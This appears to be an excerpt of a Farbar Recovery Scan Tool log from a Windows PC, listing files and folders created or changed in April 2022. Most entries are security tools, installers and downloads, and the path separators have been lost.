2022-04-26 18:31 - 2022-04-26 18:31 - 000002862 _____ C:WINDOWSsystem32TasksOneDrive Standalone Update Task-S-1-5-21-1599435516-3482468045-2126034812-1002
2022-04-26 18:31 - 2022-04-26 18:31 - 000002862 _____ C:WINDOWSsystem32TasksOneDrive Standalone Update Task-S-1-5-21-1599435516-3482468045-2126034812-1001
2022-04-26 18:31 - 2022-04-26 18:31 - 000002748 _____ C:WINDOWSsystem32TasksSystemOptimizer
2022-04-26 18:31 - 2022-04-26 18:31 - 000002588 _____ C:WINDOWSsystem32TasksLauncher GIGABYTE AORUS GRAPHICS ENGINE
2022-04-26 18:31 - 2022-04-26 18:31 - 000002534 _____ C:WINDOWSsystem32TasksSamsungMagician
2022-04-26 18:31 - 2022-04-26 18:31 - 000002404 _____ C:WINDOWSsystem32TasksBitdefender AgentTask_AD394AE64E874073B10A89FEEC305A3C
2022-04-26 18:31 - 2022-04-26 18:31 - 000002256 _____ C:WINDOWSsystem32TasksCCleanerSkipUAC - Phenom
2022-04-26 18:31 - 2022-04-26 18:31 - 000000000 ____D C:WINDOWSsystem32TasksMozilla
2022-04-26 18:31 - 2022-04-26 18:31 - 000000000 ____D C:WINDOWSsystem32TasksF-Secure
2022-04-26 18:31 - 2022-04-26 18:31 - 000000000 ____D C:WINDOWSsystem32TasksAgent Activation Runtime
2022-04-26 18:30 - 2022-04-28 18:29 - 000806946 _____ C:WINDOWSsystem32PerfStringBackup.INI
2022-04-26 18:29 - 2022-04-26 18:31 - 000017148 _____ C:WINDOWSdiagwrn.xml
2022-04-26 18:29 - 2022-04-26 18:31 - 000017148 _____ C:WINDOWSdiagerr.xml
2022-04-26 18:27 - 2022-04-28 01:13 - 000000000 ____D C:WINDOWSsystem32SleepStudy
2022-04-26 18:27 - 2022-04-26 18:27 - 000472896 _____ C:WINDOWSsystem32FNTCACHE.DAT
2022-04-26 18:27 - 2022-04-26 18:27 - 000001162 _____ C:WINDOWSsystem32configVSMIDK
2022-04-26 18:25 - 2022-04-20 23:42 - 001188744 _____ (BitDefender S.R.L. Bucharest, ROMANIA) C:WINDOWSsystem32Driversgemma.sys
2022-04-26 18:25 - 2022-04-20 23:42 - 000623008 _____ (Bitdefender) C:WINDOWSsystem32Driverstrufos.sys
2022-04-26 18:25 - 2022-04-20 23:42 - 000485792 _____ (Bitdefender) C:WINDOWSsystem32Driversvlflt.sys
2022-04-26 18:25 - 2022-04-20 23:42 - 000033208 _____ (© Bitdefender SRL) C:WINDOWSsystem32Driversbdprivmon.sys
2022-04-26 18:25 - 2022-04-20 16:13 - 000022976 _____ (Bitdefender) C:WINDOWSsystem32Driversbdelam.sys
2022-04-26 18:07 - 2022-04-26 18:27 - 000000000 ____D C:WINDOWSsystem32configbbimigrate
2022-04-26 18:04 - 2022-04-26 19:48 - 000000000 ____D C:UsersPhenom
2022-04-26 18:04 - 2021-06-05 15:04 - 000001281 _____ C:UsersUserAppDataRoamingMicrosoftWindowsStart MenuProgramsAdministrative Tools.lnk
2022-04-26 18:04 - 2021-06-05 15:04 - 000001281 _____ C:UsersPhenomAppDataRoamingMicrosoftWindowsStart MenuProgramsAdministrative Tools.lnk
2022-04-26 18:04 - 2021-06-05 15:04 - 000000407 _____ C:UsersUserAppDataRoamingMicrosoftWindowsStart MenuProgramsFile Explorer.lnk
2022-04-26 18:04 - 2021-06-05 15:04 - 000000407 _____ C:UsersPhenomAppDataRoamingMicrosoftWindowsStart MenuProgramsFile Explorer.lnk
2022-04-26 18:02 - 2022-04-26 18:07 - 000000000 ____D C:WINDOWSServiceProfiles
2022-04-26 17:59 - 2022-04-26 17:59 - 000000000 ___SD C:WINDOWSsystem32containers
2022-04-26 17:59 - 2022-04-26 17:59 - 000000000 ____D C:WINDOWSsystem32HvsiSettingsProviders
2022-04-26 17:59 - 2022-04-26 17:59 - 000000000 ____D C:Program FilesReference Assemblies
2022-04-26 17:59 - 2022-04-26 17:59 - 000000000 ____D C:Program FilesMSBuild
2022-04-26 17:59 - 2022-04-26 17:59 - 000000000 ____D C:Program Files (x86)Reference Assemblies
2022-04-26 17:59 - 2022-04-26 17:59 - 000000000 ____D C:Program Files (x86)MSBuild
2022-04-26 17:51 - 2022-04-26 17:51 - 000008192 _____ C:WINDOWSsystem32configuserdiff
2022-04-26 17:48 - 2022-04-26 19:55 - 000000000 ___DC C:WINDOWSPanther
2022-04-26 17:24 - 2022-04-26 17:24 - 000000000 ____D C:UsersPhenomAppDataLocalruffle
2022-04-26 17:23 - 2022-04-26 17:24 - 000000000 ____D C:Program FilesRuffle
2022-04-26 17:23 - 2022-04-26 17:23 - 004449380 _____ C:UsersPhenomDownloadsruffle-nightly-2022_04_26-windows-x86_64.zip
2022-04-26 17:22 - 2022-04-26 17:22 - 008692568 _____ C:UsersPhenomDownloadspapashotdoggeria.swf
2022-04-26 15:50 - 2022-04-26 15:51 - 076729013 _____ C:UsersPhenomDownloadsW11ISOPatcher-x64-2.0.1.0.zip
2022-04-26 15:35 - 2022-04-26 15:35 - 082973864 _____ (Discord Inc.) C:UsersPhenomDownloadsdiscord-1-0-9003.exe
2022-04-26 15:34 - 2022-04-26 15:34 - 082992808 _____ (Discord Inc.) C:UsersPhenomDownloadsDiscordSetup.exe
2022-04-26 14:41 - 2022-04-26 14:41 - 018694678 _____ C:UsersPhenomDownloadsDriver Booster 9.3.0.209.rar
2022-04-26 14:38 - 2022-04-26 18:27 - 000000000 ____D C:WINDOWSsystem32appmgmt
2022-04-26 14:28 - 2022-04-26 15:28 - 083143168 _____ (Discord Inc.) C:UsersPhenomDownloadsDiscordCanarySetup (1).exe
2022-04-26 13:22 - 2022-04-26 13:25 - 000000000 ____D C:ferestre11
2022-04-26 03:35 - 2022-04-26 03:35 - 007235215 _____ C:UsersPhenomDownloadsTotal Commander 10.50.rar
2022-04-26 03:00 - 2022-04-26 03:00 - 006169992 _____ (Ghisler Software GmbH) C:UsersPhenomDownloadstc1050x64_b2.exe
2022-04-26 03:00 - 2022-04-26 03:00 - 006169992 _____ (Ghisler Software GmbH) C:UsersPhenomDownloadstc1050x64_b2 (1).exe
2022-04-26 03:00 - 2022-04-26 03:00 - 005295504 _____ (Ghisler Software GmbH) C:UsersPhenomDownloadstc1050x32_b2.exe
2022-04-26 02:43 - 2022-04-26 02:48 - 1427560448 _____ C:UsersPhenomDownloadsen-us_windows_11_consumer_editions_updated_april_2022_x64_dvd_cda87c56.iso
2022-04-26 02:09 - 2022-04-26 18:27 - 000000000 ____D C:ProgramDataMicrosoftWindowsStart MenuProgramsAvira
2022-04-26 02:09 - 2022-04-26 02:09 - 000000000 ____D C:ProgramDataAvira
2022-04-26 02:09 - 2022-04-26 02:09 - 000000000 ____D C:Program Files (x86)Avira
2022-04-26 02:09 - 2022-03-30 15:16 - 000050248 _____ (The OpenVPN Project) C:WINDOWSsystem32Driversphantomtap.sys
2022-04-26 02:01 - 2022-04-26 02:01 - 000000000 ____D C:UsersPhenomAppDataRoamingMask Surf Pro
2022-04-26 02:01 - 2022-04-26 02:01 - 000000000 ____D C:UsersPhenomAppDataLocalMask_Surf_Pro
2022-04-26 02:00 - 2022-04-26 03:32 - 000000000 ____D C:UsersPhenomAppDataRoamingTor
2022-04-26 02:00 - 2022-04-26 02:06 - 000000000 ____D C:Program Files (x86)Mask Surf Pro
2022-04-26 02:00 - 2022-04-26 02:00 - 000000000 ____D C:UsersPhenomAppDataLocalItpNetLibrary
2022-04-26 02:00 - 2022-04-26 02:00 - 000000000 ____D C:ProgramDataItpNetLibrary
2022-04-26 01:57 - 2022-04-26 01:57 - 004037475 _____ C:UsersPhenomDownloadsMask.Surf.PRO.v4.1.zip
2022-04-26 01:46 - 2022-04-26 01:46 - 000043751 _____ C:UsersPhenomDownloadsFdm.rar
2022-04-26 01:42 - 2022-04-26 01:42 - 079083672 _____ (F-Secure Corporation) C:UsersPhenomDownloadsFreedome.exe
2022-04-26 00:46 - 2022-04-26 18:27 - 000000000 ____D C:ProgramDataMicrosoftWindowsStart MenuProgramsF-Secure
2022-04-26 00:46 - 2022-04-26 00:46 - 000051736 _____ (F-Secure Corporation) C:WINDOWSsystem32Driversfsbts.sys
2022-04-26 00:46 - 2022-04-26 00:46 - 000015816 _____ (F-Secure Corporation) C:WINDOWSsystem32Driversfselms.sys
2022-04-26 00:46 - 2022-04-26 00:46 - 000002051 _____ C:UsersPublicDesktopF-Secure SAFE.lnk
2022-04-26 00:27 - 2022-04-26 00:27 - 000000000 ____D C:UsersPhenomAppDataRoamingGlarysoft
2022-04-26 00:27 - 2022-04-26 00:27 - 000000000 ____D C:ProgramDataGlarysoft
2022-04-26 00:26 - 2022-04-26 00:26 - 086124135 _____ (hxxp://forum.portableappc.com/index.php) C:UsersPhenomDownloadsMalwareHunterPortable_1.146.0.763_Multilingual.paf.exe
2022-04-25 23:55 - 2022-04-25 23:55 - 002366976 _____ (Farbar) C:UsersPhenomDownloadsFRRST-64 (2).exe
2022-04-25 23:33 - 2022-04-25 23:33 - 000000000 ____D C:UsersPhenomAppDataLocalmbam
2022-04-25 23:32 - 2022-04-25 23:32 - 000103888 _____ (Malwarebytes) C:WINDOWSsystem32Driversmbae64.sys
2022-04-25 23:32 - 2022-04-18 22:12 - 000021480 _____ (Malwarebytes) C:WINDOWSsystem32DriversMbamElam.sys
2022-04-25 23:31 - 2022-04-25 23:31 - 002443448 _____ (Malwarebytes) C:UsersPhenomDownloadsMBSetup (1).exe
2022-04-25 23:26 - 2022-04-25 23:26 - 003326275 _____ C:UsersPhenomDownloadsHitmanPro.Alert.v3.8.20.939.7z
2022-04-25 19:55 - 2022-04-25 19:55 - 003487216 _____ (Sophos Limited) C:UsersPhenomDownloadsSophosInstall.exe
2022-04-25 19:54 - 2022-04-25 19:54 - 000001191 _____ C:UsersPhenomDesktopkprm-20220425195414.txt
2022-04-24 19:10 - 2022-04-24 19:10 - 008416463 _____ C:UsersPhenomDownloadsStreamlabs-3.2.0-130.apk
2022-04-23 23:14 - 2022-04-23 23:14 - 000236744 _____ C:UsersPhenomDownloadsMicrosoft_Application_Preview_License_Terms[1].pdf
2022-04-23 22:41 - 2022-04-23 22:41 - 000000000 ____D C:AdwCleaner
2022-04-23 21:34 - 2022-04-23 21:34 - 010313909 _____ C:UsersPhenomDownloadsInstaller_10.1.5.apk
2022-04-23 20:24 - 2022-04-23 20:24 - 002873487 _____ C:UsersPhenomDownloadsMicrosoft.HEVCVideoExtension_1.0.50361.0_x64__8wekyb3d8bbwe.Appx
2022-04-23 20:24 - 2022-04-23 20:24 - 001510578 _____ C:UsersPhenomDownloadsMicrosoft.HEVCVideoExtension_1.0.50361.0_x86__8wekyb3d8bbwe.Appx
2022-04-23 01:49 - 2022-04-23 01:49 - 088168595 _____ C:UsersPhenomDownloadscom.snapchat.android_11.75.0.33-84591_minAPI19(armeabi-v7a)(nodpi)_apkmirror.com.apk
2022-04-23 01:43 - 2022-04-23 01:43 - 002722983 _____ C:UsersPhenomDownloadsApp List_v1.1.3_apkpure.com.apk
2022-04-21 23:50 - 2022-04-21 23:59 - 006189548 _____ C:UsersPhenomDownloadsPID.Key.Checker.zip
2022-04-21 23:47 - 2022-04-26 18:27 - 000000000 ____D C:ProgramDataMicrosoftWindowsStart MenuProgramsSamsung Magician
2022-04-21 22:04 - 2022-04-28 17:41 - 000000000 ____D C:ProgramDataHitmanPro
2022-04-21 22:04 - 2022-04-26 00:45 - 000000000 ____D C:ProgramDataHitmanPro.Alert
2022-04-21 16:20 - 2022-04-21 16:20 - 001719496 _____ (F-Secure Corporation) C:UsersPhenomDownloadsF-Secure-Safe-Network-Installer_16mqv5j18liz4f_.exe
2022-04-21 16:07 - 2022-04-21 16:07 - 002419925 _____ C:UsersPhenomDownloadsMSAct++_v2.0.7.5.bat.7z
2022-04-21 13:42 - 2022-04-21 16:21 - 004670695 _____ C:WINDOWSZAM.krnl.trace
2022-04-20 23:48 - 2022-04-20 23:48 - 000000000 ____D C:UsersPhenomAppDataLocalunInstall
2022-04-20 23:44 - 2022-04-20 23:42 - 000055864 _____ (Bitdefender) C:WINDOWSsystem32Driversbduefiscan.sys
2022-04-20 23:41 - 2022-04-28 16:34 - 000001383 _____ C:UsersPhenomAppDataRoamingMicrosoftWindowsStart MenuProgramsESET Online Scanner.lnk
2022-04-20 23:41 - 2022-04-20 23:41 - 000000000 ____D C:UsersPhenomAppDataLocalESET
2022-04-20 22:29 - 2022-04-26 18:27 - 000000000 ____D C:ProgramDataMicrosoftWindowsStart MenuProgramsRogueKiller
2022-04-20 22:29 - 2022-04-25 23:09 - 000000899 _____ C:UsersPublicDesktopRogueKiller.lnk
2022-04-20 22:29 - 2022-04-25 23:09 - 000000000 ____D C:Program FilesRogueKiller
2022-04-20 22:29 - 2022-04-20 23:26 - 000000000 ____D C:ProgramDataRogueKiller
2022-04-20 21:08 - 2022-04-20 21:08 - 000000000 ____D C:ProgramData48C4687D-9760-4F5B-BAB3-60351B0841E4
2022-04-20 19:45 - 2022-04-20 19:46 - 000000000 ____D C:UsersPhenomAppDataRoaming.minecraft
2022-04-20 19:39 - 2022-04-28 16:39 - 000000000 ____D C:Nero
2022-04-20 19:33 - 2022-04-20 19:34 - 000000000 ____D C:UsersPhenomAppDataRoamingdvdcss
2022-04-20 16:04 - 2022-04-26 18:27 - 000000000 ____D C:ProgramDataMicrosoftWindowsStart MenuProgramsBitdefender VPN
2022-04-20 16:04 - 2022-04-20 16:04 - 000223820 _____ C:ProgramDatavpn.1650459839.bdinstall.v2.bin
2022-04-20 16:04 - 2022-04-20 16:04 - 000000000 ____D C:ProgramDataBitdefender VPN
2022-04-20 16:04 - 2022-04-20 16:04 - 000000000 ____D C:ProgramDataAnchorFree_Inc
2022-04-20 16:04 - 2020-02-20 14:02 - 000047920 _____ (The OpenVPN Project) C:WINDOWSsystem32Driverstap0901.sys
2022-04-20 15:59 - 2022-04-20 15:59 - 000769892 _____ C:ProgramDatacl.1650458995.bdinstall.v2.bin
2022-04-20 15:59 - 2022-04-20 15:59 - 000102104 _____ C:ProgramDatacl.kit.1650458992.bdinstall.v2.bin
2022-04-20 15:58 - 2022-04-26 18:27 - 000000000 ____D C:WINDOWSsystem32elambkup
2022-04-20 15:58 - 2022-04-26 18:27 - 000000000 ____D C:ProgramDataMicrosoftWindowsStart MenuProgramsBitdefender Security
2022-04-20 15:58 - 2022-04-20 16:04 - 000002195 _____ C:UsersPublicDesktopBitdefender VPN.lnk
2022-04-20 15:58 - 2022-04-20 15:58 - 000002342 _____ C:UsersPublicDesktopBitdefender.lnk
2022-04-20 15:58 - 2022-04-20 15:58 - 000000000 ____D C:ProgramDataGemma
2022-04-20 15:58 - 2022-04-20 15:58 - 000000000 ____D C:ProgramDataBDLogging
2022-04-20 15:58 - 2022-04-20 15:58 - 000000000 ____D C:ProgramDataAtc
2022-04-20 15:57 - 2022-04-20 23:42 - 003947928 _____ (Bitdefender S.R.L. Bucharest, ROMANIA) C:WINDOWSsystem32Driversatc.sys
2022-04-20 15:57 - 2022-04-20 23:42 - 000800672 _____ (Bitdefender) C:WINDOWSsystem32Driversbddci.sys
2022-04-20 15:57 - 2022-04-20 16:14 - 000000000 ____D C:ProgramDataBitdefender
2022-04-20 15:57 - 2022-04-20 16:04 - 000000000 ____D C:Program FilesBitdefender
2022-04-20 15:57 - 2022-04-20 15:57 - 000150272 _____ C:ProgramDataagent.1650459433.bdinstall.v2.bin
2022-04-20 15:57 - 2022-04-20 15:57 - 000000000 ____D C:UsersPhenomAppDataRoamingBitdefender
2022-04-20 15:57 - 2022-04-20 15:57 - 000000000 ____D C:UsersPhenomAppDataLocalBitdefender
2022-04-20 15:57 - 2022-04-20 15:57 - 000000000 ____D C:ProgramDataBitdefender Agent
2022-04-20 15:57 - 2022-04-20 15:57 - 000000000 ____D C:Program FilesBitdefender Agent
2022-04-20 15:57 - 2020-10-07 11:30 - 000185312 _____ (Bitdefender) C:WINDOWSsystem32Driversignis.sys
2022-04-20 15:56 - 2022-04-20 15:56 - 000232794 _____ C:UsersPublicDesktopmbst-clean-results.txt
2022-04-20 15:53 - 2022-04-20 15:53 - 013471344 _____ C:UsersPhenomDownloadsmb-support-1.8.7.918.exe
2022-04-20 15:49 - 2022-04-20 15:57 - 000000000 ____D C:Program FilesCommon FilesBitdefender
2022-04-20 15:33 - 2022-04-20 15:33 - 000000000 ____D C:UsersPhenomAppDataRoamingWireshark
2022-04-20 15:32 - 2022-04-23 21:13 - 000000000 ____D C:Program FilesNpcap
2022-04-20 15:24 - 2022-04-20 15:24 - 000000000 ____H C:UsersPhenomDocumentsDefault.rdp
2022-04-19 00:48 - 2022-04-19 00:48 - 000295007 _____ C:UsersPhenomDownloadsFReset.rar
2022-04-18 22:12 - 2022-04-27 13:22 - 000239560 _____ (Malwarebytes) C:WINDOWSsystem32Driversmbamswissarmy.sys
2022-04-18 21:12 - 2022-04-11 18:33 - 006189504 _____ (Realtek Semiconductor Corp.) C:WINDOWSsystem32DriversRTKVHD64.sys
2022-04-18 21:12 - 2022-04-11 18:17 - 050822203 _____ C:WINDOWSsystem32DriversRTAIODAT.DAT
2022-04-18 14:42 - 2022-04-18 14:43 - 000000000 ____D C:UsersPhenomAppDataLocalLowAdobe
2022-04-18 14:42 - 2022-04-18 14:42 - 000000000 ____D C:UsersPhenomAppDataLocalLowNVIDIA
2022-04-18 14:42 - 2022-04-18 14:42 - 000000000 ____D C:UsersPhenomAppDataLocalAdobe
2022-04-18 14:41 - 2022-04-26 14:38 - 000000000 ____D C:ProgramDataAdobe
2022-04-18 14:41 - 2022-04-26 14:38 - 000000000 ____D C:Program FilesCommon FilesAdobe
2022-04-18 14:41 - 2022-04-18 14:42 - 000000000 ___HD C:UsersPublicDocumentsAdobeGCData
2022-04-18 14:41 - 2022-04-18 14:41 - 000000000 ____D C:Program FilesAdobe
2022-04-16 18:39 - 2022-04-22 16:56 - 000000149 _____ C:UsersPubliclog.dat
2022-04-15 16:42 - 2022-04-21 16:21 - 000000000 ____D C:UsersPhenomAppDataLocalAMSDK
2022-04-15 16:42 - 2022-04-15 16:42 - 000000000 ____D C:UsersPhenomAppDataLocalZemana
2022-04-15 16:19 - 2022-04-26 18:07 - 000000000 ____D C:ProgramDataMicrosoftWindowsStart MenuProgramsGIGABYTE
2022-04-15 16:19 - 2022-04-15 16:19 - 000001243 _____ C:UsersPublicDesktopAORUS ENGINE.lnk
2022-04-15 16:19 - 2022-04-15 16:19 - 000000000 ____D C:Program Files (x86)GIGABYTE
2022-04-15 16:18 - 2022-04-15 16:18 - 163507192 _____ (GIGABYTE Technology Co.,Inc. ) C:UsersPhenomDownloadsvga_utility_aorus_setup_V2.1.5 (1).exe
2022-04-15 16:01 - 2022-04-15 16:01 - 003584960 _____ (AVG Technologies CZ) C:UsersPhenomDownloadsavg_remover_floxif.exe
2022-04-15 14:30 - 2022-04-26 18:27 - 000000000 ____D C:ProgramDataMicrosoftWindowsStart MenuPrograms7-Zip
2022-04-15 14:30 - 2022-04-15 14:30 - 001533613 _____ (Igor Pavlov) C:UsersPhenomDownloads7z2107-x64 (1).exe
2022-04-15 14:19 - 2022-04-15 14:19 - 000000000 ____D C:Program Files (x86)Samsung
2022-04-15 14:18 - 2022-04-15 14:19 - 146342615 _____ C:UsersPhenomDownloadsSamsung_Magician_Installer_Official_7.0.1.630.zip
2022-04-15 14:18 - 2022-04-15 14:18 - 000001052 _____ C:UsersPublicDesktopOBS Studio.lnk
2022-04-15 14:18 - 2022-04-15 14:18 - 000000000 ____D C:ProgramDataobs-studio-hook
2022-04-15 14:17 - 2022-04-15 14:18 - 117961440 _____ (OBS Project) C:UsersPhenomDownloadsOBS-Studio-27.2.4-Full-Installer-x64 (1).exe
2022-04-15 13:47 - 2022-04-15 13:47 - 083024040 _____ (Discord Inc.) C:UsersPhenomDownloadsDiscordCanarySetup.exe
2022-04-15 13:39 - 2022-04-25 23:32 - 000002033 _____ C:ProgramDataMicrosoftWindowsStart MenuProgramsMalwarebytes.lnk
2022-04-15 13:39 - 2022-04-25 23:31 - 000000000 ____D C:ProgramDataMalwarebytes
2022-04-15 13:39 - 2022-04-25 23:31 - 000000000 ____D C:Program FilesMalwarebytes
2022-04-15 13:24 - 2022-04-15 13:24 - 163507192 _____ (GIGABYTE Technology Co.,Inc. ) C:UsersPhenomDownloadsvga_utility_aorus_setup_V2.1.5.exe
2022-04-15 04:34 - 2022-04-23 21:08 - 000000000 ____D C:UsersPhenomAppDataRoamingSpotify
2022-04-15 04:34 - 2022-04-15 04:36 - 000000000 ____D C:UsersPhenomAppDataLocalSpotify
2022-04-14 16:51 - 2022-04-14 16:51 - 001003355 _____ C:UsersPhenomDesktopComputed Diff - Diff Checker.html
2022-04-14 16:51 - 2022-04-14 16:51 - 000000000 ____D C:UsersPhenomDesktopComputed Diff - Diff Checker_files
2022-04-14 13:42 - 2022-04-18 15:12 - 000000000 ____D C:UsersPhenomAppDataRoamingAdobe
2022-04-14 01:12 - 2022-04-14 01:12 - 000000000 ____D C:UsersPhenomAppDataLocalSome organization
2022-04-14 01:12 - 2022-04-14 01:12 - 000000000 ____D C:UsersPhenomAppDataLocalloadAman
2022-04-14 01:12 - 2022-04-14 01:12 - 000000000 ____D C:UsersPhenomAppDataLocalInstall
2022-04-13 22:40 - 2022-04-13 22:40 - 005526486 _____ C:WINDOWSrundll62
2022-04-13 22:40 - 2022-04-13 22:40 - 000000000 ____D C:UsersPhenomAppDataLocalluminati
2022-04-13 22:38 - 2022-04-13 22:52 - 000000000 ____D C:UsersPhenomAppDataRoamingDVDVideoSoft
2022-04-13 15:15 - 2022-04-13 15:16 - 000000000 ____D C:UsersPhenomAppDataLocalBrave-Smoker
2022-04-13 15:12 - 2022-04-13 15:12 - 004068068 _____ C:UsersPhenomDownloadssqlite-netFx46-static-binary-bundle-x64-2015-1.0.115.5.zip
2022-04-13 14:46 - 2022-04-13 14:47 - 075575768 _____ (BraveSoftware Inc.) C:UsersPhenomDownloadsBraveBrowserStandaloneSilentSetup.exe
2022-04-13 02:09 - 2022-04-13 02:09 - 002261809 _____ C:UsersPhenomDownloadsLSPosed-v1.8.1-6506-zygisk-release.zip
2022-04-12 23:13 - 2022-04-12 23:13 - 000000000 ____D C:WINDOWSsystem32HealthAttestationClient
2022-04-12 23:03 - 2022-04-26 17:59 - 000251216 _____ C:WINDOWSsystem32cmdiag.exe
2022-04-12 23:03 - 2022-04-26 17:59 - 000073728 _____ C:WINDOWSsystem32cmimageworker.exe
2022-04-12 23:03 - 2022-04-26 17:59 - 000032768 _____ C:WINDOWSsystem32hnsproxy.dll
2022-04-12 23:03 - 2022-04-12 23:03 - 002080992 _____ (The ICU Project) C:WINDOWSSysWOW64icu.dll
2022-04-12 23:03 - 2022-04-12 23:03 - 000617648 _____ C:WINDOWSSysWOW64TextShaping.dll
2022-04-12 23:03 - 2022-04-12 23:03 - 000523776 _____ (curl, hxxps://curl.se/) C:WINDOWSsystem32curl.exe
2022-04-12 23:03 - 2022-04-12 23:03 - 000464384 _____ (curl, hxxps://curl.se/) C:WINDOWSSysWOW64curl.exe
2022-04-12 23:03 - 2022-04-12 23:03 - 000425984 _____ C:WINDOWSSysWOW64TextInputMethodFormatter.dll
2022-04-12 23:03 - 2022-04-12 23:03 - 000267264 _____ C:WINDOWSSysWOW64Windows.Internal.UI.Dialogs.dll
2022-04-12 23:03 - 2022-04-12 23:03 - 000247808 _____ C:WINDOWSSysWOW64pku2u.dll
2022-04-12 23:03 - 2022-04-12 23:03 - 000221184 _____ C:WINDOWSSysWOW64Microsoft.Internal.FrameworkUdk.System.dll
2022-04-12 23:03 - 2022-04-12 23:03 - 000121344 _____ C:WINDOWSSysWOW64TpmTool.exe
2022-04-12 23:03 - 2022-04-12 23:03 - 000041594 _____ C:WINDOWSSysWOW64ctac.json
2022-04-12 23:03 - 2022-04-12 23:03 - 000013824 _____ C:WINDOWSSysWOW64prxyqry.dll
2022-04-12 23:03 - 2022-04-12 23:03 - 000009522 _____ C:WINDOWSsystem32ResPriUHMImageList
2022-04-12 23:03 - 2022-04-12 23:03 - 000009522 _____ C:WINDOWSsystem32ResPriImageList
2022-04-12 23:03 - 2022-04-12 23:03 - 000009522 _____ C:WINDOWSsystem32ResPriHMImageList
2022-04-12 23:03 - 2022-04-12 23:03 - 000009402 _____ C:WINDOWSsystem32ResPriHMImageListLowCost
2022-04-12 23:03 - 2022-04-12 23:03 - 000008964 _____ C:WINDOWSsystem32ResPriLMImageList
2022-04-12 23:03 - 2022-04-12 23:03 - 000008870 _____ C:WINDOWSsystem32ResPriImageListLowCost
2022-04-12 23:03 - 2022-04-12 23:03 - 000006656 _____ C:WINDOWSSysWOW64nrtapi.dll
2022-04-12 23:03 - 2022-04-12 23:03 - 000003366 _____ C:WINDOWSSysWOW64AppxProvisioning.xml
2022-04-12 23:02 - 2022-04-12 23:02 - 002550832 _____ (The ICU Project) C:WINDOWSsystem32icu.dll
2022-04-12 23:02 - 2022-04-12 23:02 - 000727576 _____ C:WINDOWSsystem32TextShaping.dll
2022-04-12 23:02 - 2022-04-12 23:02 - 000614400 _____ C:WINDOWSsystem32TextInputMethodFormatter.dll
2022-04-12 23:02 - 2022-04-12 23:02 - 000372736 _____ C:WINDOWSsystem32hwreqchk.dll
2022-04-12 23:02 - 2022-04-12 23:02 - 000339968 _____ C:WINDOWSsystem32pku2u.dll
2022-04-12 23:02 - 2022-04-12 23:02 - 000311296 _____ C:WINDOWSsystem32Microsoft.Internal.FrameworkUdk.System.dll
2022-04-12 23:02 - 2022-04-12 23:02 - 000286720 _____ C:WINDOWSsystem32AggregatorHost.exe
2022-04-12 23:02 - 2022-04-12 23:02 - 000210432 _____ C:WINDOWSsystem32CloudIdWxhExtension.dll
2022-04-12 23:02 - 2022-04-12 23:02 - 000172032 _____ C:WINDOWSsystem32DataStoreCacheDumpTool.exe
2022-04-12 23:02 - 2022-04-12 23:02 - 000099560 _____ C:WINDOWSsystem32wow64con.dll
2022-04-12 23:02 - 2022-04-12 23:02 - 000077824 _____ C:WINDOWSsystem32runexehelper.exe
2022-04-12 23:02 - 2022-04-12 23:02 - 000069632 _____ (Adobe Systems) C:WINDOWSsystem32atmlib.dll
2022-04-12 23:02 - 2022-04-12 23:02 - 000040960 _____ C:WINDOWSsystem32prxyqry.dll
2022-04-12 23:02 - 2022-04-12 23:02 - 000036864 _____ C:WINDOWSsystem32umpodev.dll
2022-04-12 23:02 - 2022-04-12 23:02 - 000024576 _____ C:WINDOWSsystem32nrtapi.dll
2022-04-12 23:02 - 2022-04-12 23:02 - 000003366 _____ C:WINDOWSsystem32AppxProvisioning.xml
2022-04-12 23:01 - 2022-04-12 23:01 - 000258048 _____ C:WINDOWSsystem32CoreMas.dll
2022-04-12 23:01 - 2022-04-12 23:01 - 000208896 _____ C:WINDOWSsystem32IHDS.dll
2022-04-12 23:01 - 2022-04-12 23:01 - 000167936 _____ C:WINDOWSsystem32TpmTool.exe
2022-04-12 23:01 - 2022-04-12 23:01 - 000041594 _____ C:WINDOWSsystem32ctac.json
2022-04-12 23:01 - 2022-04-12 23:01 - 000032768 _____ C:WINDOWSsystem32agentactivationruntimestarter.exe
2022-04-12 22:28 - 2022-04-12 22:28 - 033180147 _____ C:UsersPhenomDownloadsCCleaner 5.92.rar
2022-04-12 03:27 - 2022-04-26 18:27 - 000000000 ____D C:ProgramDataMicrosoftWindowsStart MenuProgramsDriver Easy
2022-04-12 03:27 - 2022-04-12 03:27 - 005241536 _____ (Easeware ) C:UsersPhenomDownloadsDriverEasy_Setup (4).exe
2022-04-12 03:27 - 2022-04-12 03:27 - 000001012 _____ C:UsersPublicDesktopDriver Easy.lnk
2022-04-12 03:27 - 2022-04-12 03:27 - 000000000 ____D C:UsersPhenomAppDataRoamingEaseware
2022-04-12 03:27 - 2022-04-12 03:27 - 000000000 ____D C:Program FilesEaseware
2022-04-12 03:25 - 2022-04-28 18:23 - 000000000 ____D C:Program FilesCCleaner
2022-04-12 03:25 - 2022-04-26 18:27 - 000000000 ____D C:ProgramDataMicrosoftWindowsStart MenuProgramsCCleaner
2022-04-12 03:25 - 2022-04-12 03:25 - 048787808 _____ (Piriform Software Ltd) C:UsersPhenomDownloadsccsetup592.exe
2022-04-12 03:25 - 2022-04-12 03:25 - 000000863 _____ C:UsersPublicDesktopCCleaner.lnk
2022-04-12 02:05 - 2022-04-12 02:05 - 000011338 _____ C:UsersPhenomDownloadsbindings (7).json
2022-04-12 02:00 - 2022-04-12 02:00 - 005742936 _____ C:UsersPhenomDownloadsapp-debug (8).apk
2022-04-11 23:02 - 2022-04-11 23:02 - 589302264 _____ C:UsersPhenomDownloadsBraveSoftware.rar
2022-04-11 22:42 - 2022-04-11 22:42 - 000020650 _____ C:UsersPhenomDownloadsbrave_password.csv
2022-04-11 22:42 - 2022-04-11 22:42 - 000007782 _____ C:UsersPhenomDownloadsbrave_password.rar
2022-04-11 19:00 - 2022-04-11 19:00 - 001033769 _____ C:UsersPhenomDownloadsCSVpad 1.2 64bit.zip
2022-04-11 18:58 - 2022-04-11 18:58 - 000690305 _____ C:UsersPhenomDownloadsModern CSV 1.3.35.zip
2022-04-11 18:54 - 2022-04-11 21:32 - 000000000 ____D C:UsersPhenomAppDataRoamingModern CSV
2022-04-11 18:54 - 2022-04-11 18:54 - 022953984 _____ C:UsersPhenomDownloadsModernCSV-Win-v1.3.35.msi
2022-04-11 18:54 - 2022-04-11 18:54 - 000002913 _____ C:UsersPhenomAppDataRoamingMicrosoftWindowsStart MenuModern CSV.lnk
2022-04-11 18:54 - 2022-04-11 18:54 - 000000000 ____D C:Program FilesModern CSV
2022-04-11 15:38 - 2022-04-11 15:38 - 000000000 ____D C:UsersPhenomTracing
